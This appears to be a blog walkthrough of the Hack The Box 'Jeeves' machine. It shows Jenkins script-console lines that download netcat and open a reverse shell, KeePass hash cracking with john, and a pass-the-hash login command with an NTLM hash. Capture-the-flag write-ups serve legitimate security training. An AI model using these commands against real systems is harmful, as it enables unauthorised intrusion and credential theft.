Skip to content

Hack The Box — Jeeves Writeup without Metasploit

Last updated on June 15, 2020

So its time to face the butler. His name is Jeeves, anyway we will start with the nmap scan and see which ports we can knock.

so we have 445 open. let’s knock on that shall we. maybe the butler might like it.

ignore the 139. it should be 135 but anyway nothing. now port 50000

so we found a webpage. let’s remove the port since port 80 was open

seems like Mr.Jeeves is standing at the front door. When we tried to search he threw us out with an error

since the butler was rude to us, we will bruteforce every directory available. dirbuster did its thing.

Butler was changed. New guy was called Jenkins. Let’s see if he is as nice as Mr.Jeeves.

ok since it was a windows box I couldnt inject in to /etc/passwd so found a cool video which shows how to get in to Jenkins admin

If you watch the video, you will see how he goes in to the admin section

Go to Jenkins and then manage Jenkins you will find a script console. We can execute stuff there so we are still rolling

Now we need to upload and execute a reverse shell. After a bit of googling found a reverse shell. Or we can just transfer netcat as we did before.

def process = "powershell -command Invoke-WebRequest '' -OutFile nc.exe".execute();

It’s downloaded to the box. Now lets see if we can run it.

def process = "powershell -command ./nc.exe 4444 -e cmd.exe".execute();

Alright now we have a shell. Relax a bit. I’m not gonna do kernel exploitation so lets find a way to get this done.

So we got a Windows 10 with a lot of hotfix’s installed.

So we found a file called CEH.kdbx. Must be one of those CEH students file. Anyway lets crack it. If you google the extention you will know how to crack it

we need to first transfer the file. Since we already have netcat in the box we can use it.

Have to get the hash to crack it. Use Keepass2john to get the hash and then john to crack it

After a while we got the pass.

so now lets login and see what is in there

after going through files found this hash. Accidentally deleted the screenshot which should be here. So I will just paste the command here.

pth-winexe --user=administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system // cmd.exe

BUT I DON’T WANNA LOOK ANY DEEPER. It was deep enough but yea that got me curious.

I guess that’s it for this box. Learnt from my mistakes.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published.

%d bloggers like this: